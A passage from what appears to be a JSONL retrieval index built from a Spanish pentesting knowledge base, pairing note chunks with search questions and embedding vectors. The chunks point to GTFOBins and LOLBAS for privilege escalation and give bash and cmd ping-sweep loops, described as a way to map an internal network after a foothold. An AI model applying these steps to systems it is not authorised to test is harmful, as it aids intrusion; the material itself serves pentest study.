0.068, 0.05756, -0.03094, 0.04557, 0.04357, 0.06019, -0.10535, -0.00646, 0.06099, 0.03524, 0.04257, -0.00061, -0.05556, 0.02556, 0.04754, 0.06562, -0.01788, 0.0645, 0.00704, -0.0262, -0.021, -0.01894, -0.081, -0.00492, -0.11309, -0.02458, 0.00488, -0.08112, 0.04657, 0.07403, -0.01513, 0.07359, -0.00954, 0.01016, 0.06383, -0.06361, -0.09968, -0.03877, -0.12183, -0.03396, 0.10058, -0.13949, -0.01994, 0.01374, 0.03482, 0.05801, 0.01368, -0.02562, 0.05888, 0.09348, -0.06111, -0.04387, -0.04926, -0.06777, -0.05722, 0.01382, -0.01512, 0.13473, -0.05605, 0.05566, -0.05857, -0.09467, -0.05812, 0.12159, -0.03247, -0.06982, -0.0068, 0.00569, -0.02455, -0.06054, -0.06138, -0.05623, -0.04821, 0.0037, -0.01378, 0.06094, 0.00278, -0.06996, 0.05527, -0.04257, -0.04435, -0.04676, 0.08566, -0.08473, 0.02692, -0.00666, -0.0699, 0.00267, 0.02016, -0.03694, -0.01141, 0.01664, 0.01391, 0.05968, 0.00774, -0.01465, -0.07677, -0.01906, -0.04556, 0.01806, 0.0021, -0.08684, -0.0232, -0.0687, -0.01498, -0.03208, -0.05606, -0.021, 0.04071, 0.01327, -0.05863, 0.03799, 0.00058, 0.10719, 0.0139, 0.0315, 0.04628, 0.01272, -0.07966, -0.05638, 0.00293, 0.03291, -0.03328, -0.03897, 0.05039, 0.0235, 0.03549, -0.02918, 0.02492, 0.03275, 0.02471, 0.03396, -0.00015, 0.01802, -0.01664, 0.04724, -0.0112, 0.0414, 0.046, -0.0303, 0.02105, 0.01419, 0.03261, -0.08081, -0.00592, 0.03997, -0.01054, -0.02281, -0.04513, -0.00501, -0.08148, -0.03216, -0.03431, -0.06403, -0.04564, 0.06282, 0.01382, 0.00302, 0.02865, 0.00835]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "ΒΏQuΓ© herramientas se usan comΓΊnmente en la fase de privilege escalation?", "v": [0.06602, 0.17889, -0.02027, -0.0962, -0.02842, -0.14626, -0.02742, -0.16965, 0.03324, 0.05715, -0.17817, 0.04499, -0.09572, 0.07244, 0.02074, -0.01646, -0.02463, 0.00633, -0.07389, 0.02342, -0.01245, -0.07342, -0.04241, 0.04821, -0.04497, -0.08307, 0.07121, -0.03318, -0.18546, 0.02113, 0.04601, 0.14077, 0.04903, -0.05887, 0.10538, -0.00311, -0.01804, 0.08462, 0.03012, 0.00068, -0.0866, -0.04194, -0.08907, -0.07773, 0.1005, -0.03653, -0.13706, 0.12253, 0.04718, 0.01736, -0.1179, -0.05666, 0.04702, -0.04394, 0.03758, 0.03882, 0.07617, -0.05808, 0.00601, 0.01301, -0.14827, -0.05829, -0.01087, -0.10652, -0.03349, -0.06294, -0.09085, -0.02195, -0.12095, 0.21062, -0.09081, -0.06891, 0.03679, 0.05028, -0.01856, -0.01437, 0.01283, 0.03043, 0.02972, -0.10929, 0.08469, 0.04775, -0.09976, 0.08812, -0.04326, -0.07415, 0.08303, -0.03335, 0.09994, -0.01986, 0.07692, 0.03187, -0.06693, -0.05979, 0.11167, -0.04911, 0.04183, 0.05151, -0.01359, 0.03253, 0.00982, -0.00035, -0.02161, 0.09146, -0.01738, 0.02645, -0.04955, -0.08514, -0.06283, -0.05194, 0.04903, 0.10573, -0.02004, -0.0006, -0.07532, 0.01193, 0.00712, -0.14594, -0.06663, -0.0717, 0.04077, -0.0756, 0.06335, 0.02869, 0.02794, -0.11561, -0.15251, 0.05936, 0.00344, -0.08337, -0.01544, 0.03703, -0.00733, 0.06905, 0.02721, -0.06537, 0.03634, -0.04299, -0.02498, -0.07789, 0.05591, 0.0396, -0.02901, -0.08979, 0.04432, 0.03052, 0.02209, -0.11986, -0.07036, -0.01448, -0.0598, 0.00415, 0.00776, 0.06096, -0.02228, -0.08396, -0.0262, -0.10631, 0.02295, 0.00904, -0.05366, -0.10831, -0.00342, -0.02067, -0.01228, -0.00046, -0.00748, 0.00326, -0.01199, -0.03385, 0.0397, -0.01746, 0.03006, 0.01694, -0.03018, -0.03755, -0.0928, -0.0072, -0.00419, 0.011, 0.02683, 0.03162, 0.03272, 0.01968, 0.02719, -0.031, 0.01899, -0.10523, 0.07988, 0.13592, -0.07997, 0.02457, 0.04042, -0.09892, -0.00048, -0.04415, -0.05884, 0.00663, -0.02807, 0.01826, 0.00066, -0.06562, 0.02896, -0.04232, -0.00863, 0.00848, -0.04056, -0.0351, -0.01786, 0.06811, 0.00245, -0.00192, 0.06381, 0.00708, 0.06227, 0.00118, -0.02164, 0.03393, -0.03431, -0.05591, 0.07244, 0.05415, 0.02224, -0.01531, 0.02964, 0.0009, -0.01947, 0.039, 0.06994, 0.0522, 0.02166, 0.00065, -0.03026, -0.02618, -0.03132, -0.01827, 0.04728, -0.01879, -0.01207, 0.00061, 0.05886, 0.03401, 0.04463, -0.01328, -0.07838, -0.04334, -0.0213, -0.02274, -0.04415, -0.0394, -0.05649, -0.01204, -0.01289, -0.0598, -0.02771, -0.02564]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "Con quΓ© programas puedo aprovechar el rootkit para subir privilegios?", "v": [-0.09066, 0.05247, -0.23252, -0.1176, 0.07676, -0.10704, 0.08427, -0.02409, -0.13959, -0.04359, -0.08099, -0.02736, 0.0612, -0.07829, -0.03952, -0.03379, -0.07024, 0.04449, -0.02417, 0.02939, 0.08026, -0.08926, -0.02519, -0.09844, 0.03141, 0.06379, 0.18383, 0.17315, 0.02137, 0.08594, 0.04979, 0.07798, 0.01611, -0.00981, -0.05155, -0.00228, 0.11761, 0.1615, 0.06826, -0.09227, 0.03931, 0.00757, -0.11365, 0.06987, 0.05083, -0.10624, -0.07191, -0.03202, 0.02928, -0.13914, 0.09664, -0.11421, 0.0539, -0.14295, 0.01519, -0.01643, -0.05346, -0.13374, -0.073, 0.08218, -0.06248, 0.01277, 0.02404, -0.02734, 0.00922, -0.0864, -0.02629, 0.00349, -0.07207, 0.09554, -0.08633, 0.02584, 0.06181, 0.00564, 0.05456, 0.06926, -0.05206, -0.09232, 0.03321, -0.06559, -0.00279, 0.06082, -0.03021, 0.06224, -0.06182, -0.03582, -0.0396, 0.04317, -0.02698, -0.02359, 0.06571, 0.01173, 0.02056, -0.0435, 0.13702, -0.11357, 0.04991, 0.0522, -0.00505, 0.1238, 0.10729, -0.05911, -0.01487, 0.2102, 0.01385, 0.04225, 0.07104, -0.14619, -0.02009, 0.01947, -0.0325, 0.01602, 0.00205, 0.02575, -0.04405, 0.01145, -0.10568, -0.03138, -0.04052, -0.08983, -0.02275, -0.03743, 0.03875, -0.0591, 0.05725, -0.03975, -0.05421, 0.17306, -0.05691, 0.01934, -0.04634, -0.04389, 0.0825, 0.0334, -0.04357, -0.08652, 0.06967, -0.01649, -0.02167, -0.07752, 0.0078, 0.02256, -0.05925, -0.02557, 0.07167, 0.03482, -0.07539, -0.00805, -0.02859, -0.13434, 0.02019, -0.06817, 0.02137, 0.0363, -0.03676, -0.06448, -0.00735, -0.03314, -0.00085, 0.03429, -0.04171, -0.06908, -0.09658, -0.00341, 0.01001, 0.01733, 0.02998, -0.02615, 0.01782, 0.05863, -0.01665, 0.06249, 0.02062, -0.04582, 2e-05, -0.04298, 0.0009, -0.00267, -0.01355, 0.00326, -0.04256, 0.02199, 0.10781, 0.01324, -0.07697, -0.04606, -0.02474, -0.00333, 0.06239, -0.01652, -0.04583, 0.03577, 0.00918, -0.0058, 0.00474, 0.01818, -0.00522, 0.00477, -0.02584, -0.00212, -0.03172, 0.01702, -0.01736, -0.0195, 0.07843, -0.06363, 0.03176, -0.04336, -0.03175, 0.13417, -0.08055, -0.0025, 0.07505, 0.00367, -0.00193, 0.01729, -0.01492, 0.06189, -0.0034, -0.02889, -0.01782, 0.021, 0.04666, 0.03619, 0.03798, -0.05527, -0.02996, -0.03767, 0.029, 0.04844, -0.01882, -0.02166, 0.04469, -0.02112, -0.00604, -0.03076, -0.02002, -0.00664, 0.00623, 0.01499, -0.03005, 0.05969, 0.02228, -0.05011, -0.02896, -0.0009, -0.06182, -0.00559, 0.0068, -0.01688, 0.07539, 0.01386, -0.00503, -0.0377, -0.00827, 0.03868]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "Existen alternativas libres a LOLBAS y GTFOBins?", "v": [-0.16347, -0.05195, -0.08409, 0.15888, -0.12589, -0.01854, -0.02391, 0.02728, -0.10729, 0.11722, 0.00867, -0.00319, 0.02299, 0.20737, 0.25539, 0.01193, -0.02591, -0.10235, -0.15275, 0.01689, -0.10568, 0.0881, -0.10904, -0.06873, 0.17377, -0.09343, -0.09567, -0.22793, -0.0432, 0.0565, 0.05524, -0.12778, -0.09919, 0.0319, -0.05454, 0.03337, -0.04543, 0.11782, 0.02757, 0.08986, 0.13258, -0.04252, -0.0131, 0.05966, 0.07921, -0.07954, -0.09077, 0.14697, -0.02989, -0.0109, -0.0025, 0.05043, 0.08054, -0.07304, 0.00571, -0.07696, 0.0424, -0.09914, -0.14747, 0.08824, -0.0996, 0.00131, 0.10333, -0.08998, 0.03717, -0.00939, -0.01377, 0.07344, 0.01817, 0.05742, -0.07233, 0.07761, -0.01253, -0.08288, -0.05853, 0.01454, -0.05447, -0.024, 0.05702, 0.17069, -0.02668, -0.09859, -0.03719, 0.14052, 0.0283, -0.09045, 0.10314, -0.09295, -0.02122, -0.01179, 0.07859, 0.0208, -0.01344, 0.09999, -0.05965, -0.06411, 0.04249, -0.00973, 0.03775, 0.0316, -0.03262, 0.03954, -0.03339, -0.00594, -0.05837, -0.00087, 0.06964, -0.02932, -0.05103, 0.01889, -0.00734, 0.05615, 0.04174, -0.06025, 0.0697, 0.00313, -0.02885, 0.04504, 0.01848, 0.03442, 0.01151, 0.01994, -0.02713, -0.02674, 0.0493, 0.08716, -0.04857, 0.06993, -0.01976, 0.05534, 0.07554, 0.00964, -0.02237, -0.01896, -0.07914, -0.00731, 0.04977, -0.04357, -0.01488, 0.00473, 0.01155, 0.06244, 0.04933, -0.01544, 0.06222, 0.01523, 0.02218, -0.08867, 0.01551, 0.01747, 0.02616, -0.02295, 0.0166, 0.04505, 0.04108, 0.01062, -0.03839, -0.02166, -0.07029, 0.05903, 0.02596, 0.02692, -0.01388, 0.00114, -0.0176, 0.01024, 0.00047, -0.02759, -0.04058, -0.01609, -0.01801, 0.00338, 0.0158, -0.01444, 0.06424, -0.01152, 0.01517, -0.03184, -0.01524, -0.08917, 0.02573, -0.01849, -0.05468, -0.00459, -0.04119, -0.08111, 0.08266, -0.00833, 0.02021, 0.01485, 0.02735, 0.05941, -0.05447, -0.0239, 0.01477, 0.0248, 0.01271, -0.03743, 0.00696, 0.05425, -0.06472, -0.0394, 0.00874, 0.02928, -0.00579, 0.00671, -0.00358, 0.04411, -0.03285, 0.00632, 0.01894, -0.05818, 0.00068, -0.08838, 0.0585, -0.00846, 0.06067, -0.0155, 0.03862, -0.03686, 0.0316, 0.0038, 0.04082, -0.0511, -0.04262, 0.05012, -0.0139, 0.05864, 0.00685, 0.00351, 0.02406, 0.04374, -0.0094, -0.0926, 0.01243, 0.06552, 0.00867, 0.05937, 0.02299, 0.0445, 0.01538, 0.03558, -0.02587, 0.04063, -0.01967, -0.00165, -0.01708, 0.01563, -0.01891, 0.03053, -0.04386, 0.0293, -0.00478, -0.00657, -0.01378, -0.01549]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "indexar": "que herramienta sirve para enumerar toda la red usando la salida de Nmap?", "v": [-0.10474, 0.05016, -0.1927, -0.21627, 0.01873, -0.09192, -0.18474, 0.01361, -0.00517, -0.06988, -0.18986, -0.16902, 0.05115, -0.10162, -0.02296, 0.07753, -0.04147, -0.05909, 0.04553, 0.04932, -0.07677, 0.04006, -0.05468, -0.0085, -0.05909, 0.11993, 0.04934, -0.08794, -0.16536, 0.08112, 0.00042, 0.02843, 0.01507, -0.15385, -0.10609, -0.0453, 0.05752, -0.08004, -0.11572, 0.0651, -0.07308, 0.08353, -0.06912, 0.02341, 0.01299, 0.01148, -0.03278, 0.02348, -0.02405, 0.01865, -0.06204, -0.13876, -0.16222, -0.08809, -0.05504, -0.16853, 0.109, -0.04245, -0.0495, -0.05271, -0.05999, -0.07461, -0.03981, -0.04566, -0.02051, -0.08033, -0.0241, -0.07077, -0.02253, 0.03374, -0.03486, 0.0659, 0.04625, 0.04751, 0.01078, -0.02733, -0.01405, 0.03355, 0.08927, 0.03952, 0.05484, -0.0207, -0.12193, -0.02721, -0.03141, -0.08408, 0.15661, -0.01207, 0.04615, -0.0578, -0.06711, 0.03778, 0.02718, -0.0004, 0.06127, -0.02367, 0.00636, -0.0129, 0.04691, -0.01755, 0.17294, -0.02557, -0.11629, 0.01635, 0.00947, 0.0241, 0.05999, -0.0087, -0.06345, 0.04949, 0.02761, 0.01344, -0.01454, -0.03887, -0.01079, 0.01657, -0.04321, -0.01438, -0.07719, -0.03665, 0.08497, 0.00871, -0.09199, -0.02281, 0.02788, -0.02232, -0.11429, 0.05451, -0.01952, -0.0876, -0.02571, -0.02189, -0.09151, 0.01001, -0.07183, -0.06551, -0.00284, -0.09365, 0.02706, -0.04274, 0.00877, 0.04553, -0.07593, -0.11502, -0.00119, 0.05157, 0.01955, -0.04137, -0.02627, 0.02852, 0.01488, -0.04471, -0.02879, 0.03079, -0.04016, 0.016, 0.01882, 0.04954, -0.12635, 0.05793, -0.08307, -0.05913, 0.03251, 0.06518, 0.02937, -0.04723, 0.05324, -0.01338, 0.07852, 0.01895, 0.05072, 0.07241, 0.05649, -0.0459, -0.00886, -0.08486, -0.05399, -0.02756, 0.01665, -0.06662, 0.01624, -0.0165, -0.03365, -0.00473, -0.0142, -0.03794, -0.01063, -0.06968, 0.03612, -0.04222, -0.07941, 0.03985, 0.06422, -0.08954, 0.03669, -0.00199, 0.01737, -0.06414, 0.01463, -0.05121, -0.04837, -0.00923, -0.02052, -0.01029, 0.04242, 0.09206, -0.00439, 0.04266, -0.00072, 0.036, 0.02363, 0.03851, 0.01967, 0.01395, -0.02665, -0.05444, 0.04715, 0.03311, 0.01112, -0.02608, 0.08341, 0.00191, -0.02277, 0.06475, -0.03751, 0.03005, 0.01642, -0.02558, -0.01049, -0.00808, 0.05209, -0.01269, 0.00963, -0.01169, -0.0112, -0.08091, 0.03615, 0.02474, -0.04616, -0.06388, -0.03337, 0.01153, -0.06932, -0.02372, -0.02832, -0.04267, 0.0083, -0.04481, 0.02072, -0.06806, -0.00963, 0.01981, 0.06651, -0.03311, 0.0259, -0.01749]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "indexar": "con quΓ© puedo montar un bucle bash que lea greppeables desde Nmap y guarde IPs?", "v": [0.00981, -0.02417, -0.15925, -0.00294, -0.11389, -0.09381, -0.00152, 0.1096, -0.15363, -0.02203, 0.01377, -0.01325, -0.03702, 0.07874, -0.14661, 0.18828, -0.20117, -0.0284, -0.00173, 0.00199, -0.01162, 0.06547, -0.05382, -0.05947, -0.07165, 0.07151, -0.08039, 0.07953, -0.18118, -0.02285, -0.16076, -0.04464, -0.03922, -0.06023, -0.06856, -0.15817, 0.01809, -0.02825, -0.0816, 0.04387, -0.16544, -0.09832, -0.07884, 0.02038, 0.1015, -0.02077, 0.03063, -0.02409, 0.04479, -0.05804, -0.09697, -0.08916, -0.10077, -0.06382, -0.09872, -0.0094, 0.08826, 0.00991, -0.04964, 0.03635, -0.10121, 0.12746, 0.02498, -0.08598, -0.01385, -0.06095, -0.04758, -0.06913, -0.13158, -0.09318, 0.025, -0.03861, -0.14199, 0.12938, 0.00536, 0.05884, -0.00068, -0.00263, 0.0534, 0.0833, 0.00325, 0.06767, -0.12696, 0.07075, -0.03916, 0.01866, 0.04064, -0.15794, -0.00666, 0.00306, 0.12016, 0.10459, -0.02131, 0.04202, -0.05368, -0.05812, -0.00919, 0.16788, -0.03028, -0.08615, 0.02669, 0.06215, -0.10132, 0.16195, 0.06942, 0.01342, 0.12517, 0.06448, 0.05527, -0.01293, -0.00671, 0.07851, -0.11099, 0.00166, 0.02341, -0.06675, -0.01598, 0.03169, -0.01939, -0.03708, 0.04822, -0.01529, 0.01349, -0.00135, 0.11575, 0.06655, 0.03137, 0.10577, -0.02159, 0.03347, -0.01659, 0.01791, 0.00583, -0.04507, 0.04409, -0.00625, -0.06921, -0.04404, -0.02233, 0.05192, 0.0608, -0.034, -0.02797, -0.00827, 0.01368, -0.03739, 0.03312, -0.05544, -0.01032, 0.02938, 0.01084, 0.07275, 0.02521, 0.06626, -0.07611, 0.02133, 0.00979, -0.03244, 0.03007, 0.0532, -0.0127, 0.02919, 0.02271, 0.04891, 0.01085, 0.00853, -0.07183, 0.01063, 0.05488, 0.05764, -0.03585, 0.01553, -0.02, -0.0144, 0.01234, -0.03721, -0.0926, -0.03586, 0.08825, -0.04141, -0.00491, 0.01688, 0.01049, 0.03626, 0.00196, -0.00522, 0.04526, 0.00965, 0.01944, 0.08905, 0.01581, 0.00479, 0.03252, -0.00161, -0.01687, -0.10557, -0.01996, -0.04509, -0.03005, 0.02748, -0.01396, -0.01093, -0.02029, -0.00081, 0.02675, -0.03896, -0.03997, 0.01533, 0.02299, 0.01162, 0.01258, -0.00447, -0.00688, -0.03271, -0.02826, -0.01606, 0.02976, 0.03304, -0.00101, -0.00772, 0.02593, 0.0413, 0.0065, 0.00978, -0.04562, -0.01778, -0.05623, -0.00249, 0.00342, -0.02172, -0.03573, -0.0098, -0.0492, 0.00901, -0.0055, -0.01386, 0.00415, 0.00334, 0.03821, -0.02907, -0.00561, 0.04424, -0.03269, -0.07693, -0.03663, -0.08434, -0.0378, 0.06369, -0.01157, -0.05711, -0.03976, 0.00354, -0.02359, -0.07196, -0.04567, -0.02151]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "que herramienta sirve para descubrir hosts sin instalar nmap", "v": [0.10666, 0.04565, -0.2614, -0.26019, 0.08871, -0.10453, -0.18375, -0.05617, -0.07996, -0.06768, -0.04507, -0.05601, 0.02051, -0.09034, 0.00126, 0.09054, 0.01214, -0.15338, 0.0397, 0.11982, -0.05108, 0.0883, -0.12397, -0.02401, -0.03474, 0.05937, 0.0051, -0.00626, -0.1765, -0.0354, 0.0167, -0.04892, -0.03251, -0.06965, -0.06729, -0.08861, -0.01656, -0.10159, -0.00976, 0.05425, 0.01092, 0.0902, 0.04206, 0.11263, -0.02764, -0.02245, -0.07317, -0.08127, 0.0136, 0.0592, -0.02125, -0.07675, -0.09054, -0.03643, -0.01256, -0.15292, 0.06842, -0.12777, 0.03536, -0.02926, -0.14866, 0.09159, -0.08125, -0.04251, 0.06688, -0.04046, -0.04582, -0.02736, -0.12228, -0.03843, -0.06666, -0.03036, 0.12195, -0.02632, -0.07327, 0.03592, 0.02812, -0.00074, 0.10577, -0.02106, 0.11549, -0.0326, -0.07854, -0.0398, -0.07777, -0.08805, 0.10697, -0.0238, 0.03214, -0.08912, -0.00983, 0.12048, 0.0338, 0.04679, 0.05633, -0.1233, 0.13772, -0.06217, 0.04984, 0.04854, 0.11725, -0.03003, -0.03875, 0.11767, -0.04963, -0.00639, 0.03406, -0.03671, -0.03309, -0.0469, 0.12201, 0.10173, -0.0712, -0.01783, 0.0166, 0.01527, 0.02103, -0.04397, -0.06555, -0.06147, -0.0668, -0.01741, -0.02659, 0.05304, 0.00104, -0.02216, 0.00406, 0.04753, 0.06262, 0.02174, 0.01691, -0.08787, -0.01646, 0.09259, -0.0403, -0.04006, 0.01295, -0.07573, -0.06269, 0.01448, -0.00724, 0.05907, -0.04476, -0.11837, 0.03723, 0.04056, 0.01488, -0.01409, 0.01581, 0.00463, 0.04653, -0.01484, -0.01579, 0.05924, -0.05413, -0.01371, 0.03996, -0.02317, -0.06058, 0.07576, 0.01136, -0.09348, 0.05743, -0.01998, 0.00512, -0.03838, -0.02347, -0.01051, 0.10562, 0.05498, 0.01967, 0.03103, 0.0495, -0.0315, 0.0237, -0.03735, -0.00221, -0.01629, 0.04503, -0.05395, -0.04813, 0.00538, -0.01614, 0.00091, -0.05054, -0.02414, 0.0136, -0.04014, -0.07095, -0.0001, 0.01819, 0.02796, -0.02434, -0.0367, 0.02344, -0.03155, -0.02217, -0.0811, 0.00771, 0.00404, -0.05189, 0.04697, -0.03982, -0.01446, 0.06991, 0.01359, -0.0587, 0.02273, 0.00476, 0.03137, 0.03378, -0.00052, 0.01284, -0.0475, 0.00898, -0.02719, -0.02703, 0.00862, 0.00025, 0.03003, 0.02156, 0.00041, 0.04232, -0.018, -0.00793, -0.01938, 0.02831, 0.00315, 0.02774, -0.01206, -0.00422, -0.00174, 0.00225, 0.03218, 0.03301, -0.06722, 0.04781, -0.01866, -0.03279, -0.00361, 0.02164, 0.03807, 0.03726, -0.06623, -0.04317, -0.05252, 0.0322, -0.01507, -0.01579, -0.04214, -0.03563, 0.01434, 0.07367, -0.02646, 0.00434, 0.02895]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "con que puedo escanear una subred rΓ‘pidamente desde la terminal", "v": [-0.10497, -0.01099, -0.18501, -0.08503, 0.01535, -0.01867, -0.13053, -0.01605, 0.06005, 0.17068, -0.24942, 0.03857, 0.06495, -0.03547, 0.08474, 0.10844, -0.14865, -0.03964, 0.21372, 0.08202, 0.04401, 0.01309, 0.02556, 0.04738, 0.11073, 0.05431, -0.00883, 0.01406, -0.12785, -0.1859, -0.02554, 0.03099, 0.14613, -0.02153, -0.05317, -0.02457, 0.06719, 0.05141, 0.01969, 0.06045, -0.04989, -0.06205, -0.14807, -0.03911, 0.09898, -0.04241, -0.07752, 0.10992, 0.04224, -0.01236, -0.04772, -0.03743, -0.1176, 0.06034, -0.059, -0.02975, 0.06452, -0.05695, 0.10687, -0.00865, -0.04129, 0.078, 0.05979, 0.04812, 0.00016, 0.06425, -0.02051, 0.05836, -0.04404, 0.02858, -0.05092, 0.06996, 0.00675, 0.05412, -0.00872, -4e-05, -0.12226, 0.03421, 0.11992, 0.1083, 0.03986, 0.03461, -0.06598, 0.0045, 0.01706, -0.08026, -0.0879, 0.00435, 0.01827, 0.03056, 0.04678, -0.04642, 0.04642, 0.05035, -0.002, -0.06094, -0.0196, -0.00809, -0.07981, -0.08342, 0.02251, 0.02465, -0.09173, 0.13932, 0.04833, -0.00736, 0.01684, -0.04227, -0.01151, -0.01101, 0.04892, 0.01598, 0.0685, -0.03667, -0.17274, -0.04465, -0.02938, 0.00498, -0.0506, 0.03496, -0.01041, -0.07815, -0.00495, 0.01174, 0.06815, -0.06221, -0.02273, 0.00584, 0.1489, 0.07313, -0.04883, 0.00043, 0.0246, -0.05231, -0.05929, -0.04628, 0.02906, -0.16749, 0.03641, 0.04811, -0.00999, 0.0222, -0.03906, 0.0193, 0.02213, 0.04352, -0.0807, -0.05699, -0.02821, -0.11881, 0.04122, -0.02355, -0.06574, -0.00584, -0.0627, 0.06205, 0.08085, 0.05646, -0.05993, 0.06791, -0.05613, -0.06199, -0.07911, 0.03776, -0.06362, -0.07393, -0.0999, -0.03311, -0.02346, -0.00322, 0.00232, 0.04128, -0.02229, -0.00348, 0.11226, 0.03771, 0.00291, -0.02905, 0.01128, -0.02942, -0.03173, -0.00164, -0.03215, 0.00521, 0.02237, -0.09371, 0.00824, -0.03978, 0.02624, 0.05946, 0.07779, 0.0547, 0.01347, 0.06015, -0.056, 0.0281, 0.02577, 0.03457, -0.04642, -0.07028, -0.05042, 0.02794, 0.05283, -0.05411, 0.05363, -0.01936, -0.11365, 0.00363, 0.02297, 0.05022, -0.0337, 0.03604, 0.03811, 0.00398, 0.02012, -0.01462, -0.04937, 0.0479, -0.01988, -0.00493, 0.01346, -0.02752, 0.07327, 0.05196, -0.06033, -0.01284, 0.01504, 0.01812, 0.02292, 0.0235, 0.02269, 0.03391, -0.0058, -0.02691, 0.013, 0.00259, 0.00712, -0.03449, -0.02332, 0.03023, 0.01222, 0.05162, 0.01248, 0.00841, 0.00076, -0.01881, -0.01759, -0.01716, -0.00287, 0.0177, -0.00663, 0.01922, 0.02327, -0.03335, -0.04636, 0.00598]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "cual es una alternativa libre a nmap para hacer ping sweep", "v": [-0.00974, 0.03557, -0.16495, -0.03815, -0.10253, -0.04738, -0.12818, -0.07222, -0.18454, -0.03002, 0.03615, -0.03802, 0.04675, -0.07468, -0.08222, -0.0054, -0.12576, 0.02216, 0.20488, 0.10304, -0.14377, 0.12491, -0.1081, -0.09343, 0.05091, -0.00999, 0.01624, 0.13145, -0.11562, 0.00664, -0.0501, 0.0293, 0.05065, 0.01439, -0.05111, 0.1146, 0.20304, 0.0033, 0.06961, -0.01908, -0.09726, -0.00569, -0.13481, 0.09261, -0.0442, -0.07521, -0.00545, 0.02731, 0.02065, 0.0375, -0.1005, 0.05208, -0.0622, -0.0647, 0.04181, 0.06566, 0.05534, -0.18878, -0.07628, -0.04544, -0.05645, 0.09796, -0.02355, -0.11143, 0.06316, -0.00202, -0.04292, -0.06694, -0.01706, 0.02727, 0.03924, -0.03118, 0.07275, -0.03289, -0.03676, 0.04656, -0.09346, -0.06319, 0.01755, -0.03171, 0.07733, -0.10688, -0.08912, 0.033, -0.01572, -0.14029, 0.00424, -0.10938, 0.03879, 0.016, 0.08941, 0.11712, -0.02198, 0.13161, -0.00959, -0.03811, -0.04622, 0.01371, -0.00105, 0.09327, 0.08251, 0.06742, -0.18071, 0.02322, 0.02246, -0.05926, -0.00223, 0.10738, -0.02953, -0.00053, 0.06199, 0.0868, -0.10301, -0.03866, 0.03348, -0.0754, -0.04793, 0.02122, -0.01798, 0.0208, -0.04795, -0.06571, -0.01157, -0.02953, -0.01342, 0.0623, 0.11843, -0.00993, 0.03291, 0.09301, 0.08468, 0.01139, -0.1118, -0.03684, -0.05541, -0.10344, 0.0765, -0.04132, -0.00882, 0.07888, 0.00764, -0.00605, 0.00093, -0.03416, -0.01077, -0.02007, 0.07364, -0.03624, -0.00676, -0.04715, -0.02799, -0.00052, -0.03648, 0.06648, 0.05093, -0.00571, -0.06125, -0.03819, -0.03417, 0.10401, 